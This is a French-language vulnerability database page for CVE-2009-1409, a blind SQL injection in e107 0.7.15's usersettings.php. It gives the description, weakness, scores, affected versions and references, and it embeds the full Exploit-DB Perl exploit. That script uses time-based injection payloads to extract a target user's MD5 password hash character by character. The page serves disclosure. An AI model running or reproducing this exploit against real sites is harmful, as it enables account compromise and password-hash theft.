CVE-2009-1409 : Détail

CVE-2009-1409

SQL Injection
A03-Injection
1.77%V3
Network
2009-04-24
12h00 +00:00
2017-09-28
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in usersettings.php in e107 0.7.15 and earlier, when "Extended User Fields" is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the hide parameter, a different vector than CVE-2005-4224 and CVE-2008-5320.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 8495

Date de publication : 2009-04-19 22h00 +00:00
Auteur : StAkeR
EDB Vérifié : Yes

#!/usr/bin/env perl # # e107 <= 0.7.15 "extended_user_fields" Blind SQL Injection Exploit # # Description # ------------------------------------------------------------------- # e107 contains one flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the "usersettings.php" script # not properly saniting user-supplied input to the hide[] key. # This may allow an attacker to inject or manipulate sql queries in # the backend database if magic_quotes_gpc = off. # ------------------------------------------------------------------- # Code Details (usersettings.php) # ------------------------------------------------------------------- # Line 433 - 441 # # if($ue_fields) { # $hidden_fields = implode("^", array_keys($_POST['hide'])); <------ {1} # # if($hidden_fields != "") # { # $hidden_fields = "^".$hidden_fields."^"; # } # $ue_fields .= ", user_hidden_fields = '".$hidden_fields."'"; <---- {2} # } # # Line 470 - 476 # # if($ue_fields) # { # [etc..] # $sql->db_Update("user_extended", $ue_fields." WHERE user_extended_id = '".intval($inp)."'"); # } # # ue[] POST variable needs a valid key # such as "aim","msn" or other user_extended_fields # (@fields array). # # Fix this sql injection using (php function) # mysql_real_escape_string to the POST 'hide' key, # otherwise find a way to fix it. dont care # ------------------------------------------ # Discovered & Written # by Juri Gianni aka yeat - staker[at]hotmail[dot]it # # Thanks to # --------------------------------------------- # JosS,girex,str0ke,certaindeath,plucky # #zeroidentity chan - http://zeroidentity.org # --------------------------------------------- # http://www.youtube.com/watch?v=0rgInHvW8Ic # http://www.youtube.com/watch?v=O2y62xcUJ8E # --------------------------------------------- use LWP::UserAgent; my $prefix = "e107_"; # default table_prefix my $type_i = undef; my $sock_u = new LWP::UserAgent; my ($domain,$user_name,$user_pwd,$target) = @ARGV; e107::Usage() unless scalar (@ARGV) > 3; e107::Login($user_name,$user_pwd); $type_i = e107::ExtendedField(); e107::Exploit(); sub e107::Usage { print "e107 <= 0.7.15 'extended_user_fields' Blind SQL Injection Exploit\n"; print "Usage: perl xpl.pl http://[host]/[path] [username] [password] [target id]\n"; print "Usage: perl xpl.pl http://localhost/e107 yeat an4rchy 1\n"; exit; } sub e107::Exploit { e107::Vulnerable(); e107::BruteForce(); } sub e107::SqlQuery { my ($do_query,$response,$start,$down,$element); $do_query = $_[0] || die $!; $start = time(); $response = $sock_u->post($domain.'/usersettings.php', [ "email" => 'doesnt@exists.net', "ue[user_$type_i]" => 1, "hide[$do_query]" => 1, "updatesettings" => 'Save Settings', ]) or die $!; $down = time(); return $down - $start; } sub e107::CheckField { my ($do_query,$response,$start,$down,$element); $do_query = $_[0]; $element = $_[1] || die $!; $start = time(); $response = $sock_u->post($domain.'/usersettings.php', [ "email" => 'doesnt@exists.net', "ue[user_$element]" => 1, "hide[$do_query]" => 1, "updatesettings" => 'Save Settings', ]) or die $!; $down = time(); return $down - $start; } sub e107::ExtendedField { my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage'); my $query = "\x27/**/OR/**/CASE/**/WHEN(1>0)/**/THEN". "/**/benchmark(100000000,CHAR(0))/**/END#"; for (my $i=1;$i<8;$i++) { if (e107::CheckField($query,$fields[$i]) > 6) { return $fields[$i]; last; } unless ($i != 8 && $fields[$i]) { die("Site not vulnerable..\n"); } } } sub e107::SqlBrute { my $ascii = $_[0]; my $limit = $_[1] || 1; my $sql_query = "\x27/**/OR/**/(SELECT/**/IF((ASCII(SUBSTRING(user_password,$limit,1))". "=$ascii),benchmark(200000000,CHAR(0)),0)/**/FROM/**/${prefix}user/**/". "WHERE/**/user_id=$target)#"; return $sql_query; } sub e107::BruteForce { my $i = 1; my @charset = (97..102,48..57); my $convert = undef; my $result = undef; for ($i..32) { foreach $convert (@charset) { if (e107::SqlQuery(e107::SqlBrute($convert,$i)) > 9) { syswrite(STDOUT,chr($convert)); $i++; last; $result .= chr($convert); } } } unless (length($result) != 32) { print "\nHash MD5: $result\n"; print "User ID: $target\n"; } } sub e107::Vulnerable { my @fields = ('yeat','aim','birthday','icq','language','location','msn','yahoo','homepage'); for (my $i=1;$i<8;$i++) { if ($fields[$i] eq $type_i) { print "Exploiting..\n"; last; } else { die ("Site not vulnerable..\n"); } } } sub e107::Login { my ($username,$password) = @_; my ($result,$response); $response = $sock_u->post($domain.'/signup.php', [ username => $username, userpass => $password, userlogin => 'Login', autologin => 0 ]) or die $!; $result = $response->as_string; if ($result =~ /e107cookie=(\d+)\.([0-9a-f]{32})/i) { $sock_u->default_header('Cookie' => "e107cookie=$1.$2;"); $sock_u->agent('Lynx (textmode) - Logged'); } else { die("Login failed..\n"); } } # milw0rm.com [2009-04-20]

Products Mentioned

Configuraton 0

E107>>E107 >> Version To (including) 0.7.15

E107>>E107 >> Version 0.6_10

    E107>>E107 >> Version 0.6_11

      E107>>E107 >> Version 0.6_12

        E107>>E107 >> Version 0.6_13

          E107>>E107 >> Version 0.6_14

            E107>>E107 >> Version 0.6_15

              E107>>E107 >> Version 0.6_15a

                E107>>E107 >> Version 0.7

                E107>>E107 >> Version 0.7.1

                E107>>E107 >> Version 0.7.2

                E107>>E107 >> Version 0.7.3

                E107>>E107 >> Version 0.7.4

                E107>>E107 >> Version 0.7.5

                E107>>E107 >> Version 0.7.6

                E107>>E107 >> Version 0.7.7

                E107>>E107 >> Version 0.7.8

                E107>>E107 >> Version 0.7.9

                E107>>E107 >> Version 0.7.10

                E107>>E107 >> Version 0.7.11

                E107>>E107 >> Version 0.7.13

                E107>>E107 >> Version 0.545

                  E107>>E107 >> Version 0.547_beta

                    E107>>E107 >> Version 0.548_beta

                      E107>>E107 >> Version 0.549_beta

                        E107>>E107 >> Version 0.551_beta

                          E107>>E107 >> Version 0.552_beta

                            E107>>E107 >> Version 0.553_beta

                              E107>>E107 >> Version 0.554

                                E107>>E107 >> Version 0.554_beta

                                  E107>>E107 >> Version 0.555_beta

                                    E107>>E107 >> Version 0.600

                                    E107>>E107 >> Version 0.601

                                    E107>>E107 >> Version 0.602

                                    E107>>E107 >> Version 0.603

                                    E107>>E107 >> Version 0.604

                                    E107>>E107 >> Version 0.605

                                    E107>>E107 >> Version 0.606

                                    E107>>E107 >> Version 0.607

                                    E107>>E107 >> Version 0.608

                                    E107>>E107 >> Version 0.609

                                    E107>>E107 >> Version 0.610

                                    E107>>E107 >> Version 0.611

                                    E107>>E107 >> Version 0.612

                                    E107>>E107 >> Version 0.613

                                    E107>>E107 >> Version 0.614

                                    E107>>E107 >> Version 0.615

                                    E107>>E107 >> Version 0.615a

                                    E107>>E107 >> Version 0.616

                                    E107>>E107 >> Version 0.617

                                    E107>>E107 >> Version 0.6171

                                    E107>>E107 >> Version 0.6172

                                    E107>>E107 >> Version 0.6173

                                    E107>>E107 >> Version 0.6174

                                    E107>>E107 >> Version 0.6175

                                    E107>>E107 >> Version 1.0.1

                                    E107>>E107 >> Version 5.1

                                      E107>>E107 >> Version 5.2

                                        E107>>E107 >> Version 5.3_beta

                                          E107>>E107 >> Version 5.3_beta2

                                            E107>>E107 >> Version 5.04

                                              E107>>E107 >> Version 5.4_beta1

                                                E107>>E107 >> Version 5.4_beta3

                                                  E107>>E107 >> Version 5.4_beta4

                                                    E107>>E107 >> Version 5.4_beta5

                                                      E107>>E107 >> Version 5.4_beta6

                                                        E107>>E107 >> Version 5.05

                                                          E107>>E107 >> Version 5.21

                                                            Références

                                                            http://secunia.com/advisories/34823
                                                            Tags : third-party-advisory, x_refsource_SECUNIA
                                                            http://osvdb.org/53812
                                                            Tags : vdb-entry, x_refsource_OSVDB
                                                            https://www.exploit-db.com/exploits/8495
                                                            Tags : exploit, x_refsource_EXPLOIT-DB
                                                            http://www.securityfocus.com/bid/34614
                                                            Tags : vdb-entry, x_refsource_BID